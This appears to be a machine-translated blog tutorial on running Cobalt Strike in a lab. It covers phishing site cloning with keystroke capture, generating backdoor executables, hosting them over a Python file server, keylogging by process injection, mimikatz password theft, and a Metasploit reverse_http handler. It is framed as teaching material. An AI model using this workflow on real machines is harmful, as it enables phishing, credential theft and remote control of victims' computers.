This experiment runs in a safe and isolated environment
For teaching purposes only

Environmental Science

• kali：Cobalt Strike4.3,192.168.225.129
• winxp：192.168.225.130

To configure cs

start-up cs The server

First of all cs Folder permissions

chmod -R 777 ./cobaltstrike4.3  

start-up cs The server ,teamserver ip password, Custom password ,ip Fill in the public network / LAN , Can't fill in 127.0.0.1

Default port 50050

Log in to the client

sh ./start.sh

Here, the client is directly opened on the server , So you can fill in 127.0.0.1, It is better to fill in the LAN IP

Web phishing

Select clone site

Clone the target website as phishing , Check the record keyboard

The target machine accesses and enters text

The input content can be intercepted

Target penetration

establish Listener

First create a listener

add One http Monitor ,host Select client ip

Beacon For built-in Listener, obtain shell To CS On ,Foreign For external combination Listener, Commonly used in MSF The combination of

Create success

Create a back door

attack package There are four kinds.

1. hta
2. office macro
3. Customize payload
4. exe

Demonstrate options exe, Configure the corresponding listener , Then create 32 Bit exe

Save it to the desktop

If it is hta, function mshta URL that will do

The target is on line

This step simulates the victim downloading malicious exe

*python File server

Run on the desktop

python3 -m http.server 8010

Target access , Click on the run

Can trigger cs go online

cs Built in file server

Make it convenient , Select file server phishing

Select the generated back door , Then change a name

Target access url, Click on the run

Trigger cs go online

modify sleep Time

Default 60 The second target notifies the server of the survival status , To hide yourself , And get the command to be executed once , It is necessary to shorten this time to perform penetration in order to get a good echo

Just make it smaller , Demo changed to 1s

Read directory

Process injection records keyboard input

The target opens a browser

cs Browse process

Inject explore.exe, And click the log ketstrokes Recording keyboard

After successful injection, a new process will be launched , It's the same as above Don't forget to put sleep The small

The target enters characters in the browser ,cs The keylog window receives the input character

Screenshot

Open the screenshot window to see

mimikatz Get password

Cobalt Strike linkage msfconsole

First of all to ensure cs go online

Create a foreign http Monitor ,ip Fill in the public network / LAN , Make an uncommon port

then cs The client starts msf, here ip You can fill in 127

msfconsole
use exploit/multi/handler
set lhost 127.0.0.1
set lport 5555
set payload windows/meterpreter/reverse_http
exploit

It is equivalent to that the request of the target plane is sent to msf

Configure target generation request

choice msf The monitor for

Just a minute

Plug in installation

Use the plug-in of Tao , After decompressing load cna file

Mail can be sent to the online machine

Reference resources

https://www.freebuf.com/company-information/167460.html
https://github.com/DeEpinGh0st/Erebus
https://github.com/pandasec888/taowu-cobalt-strike

End

Welcome to follow me CSDN Blog ：@Ho1aAs
Copyright belongs to ：Ho1aAs
Link to this article ：https://blog.csdn.net/Xxy605/article/details/125388547
Copyright notice ： This article is original , When reprinted, please indicate the source and this statement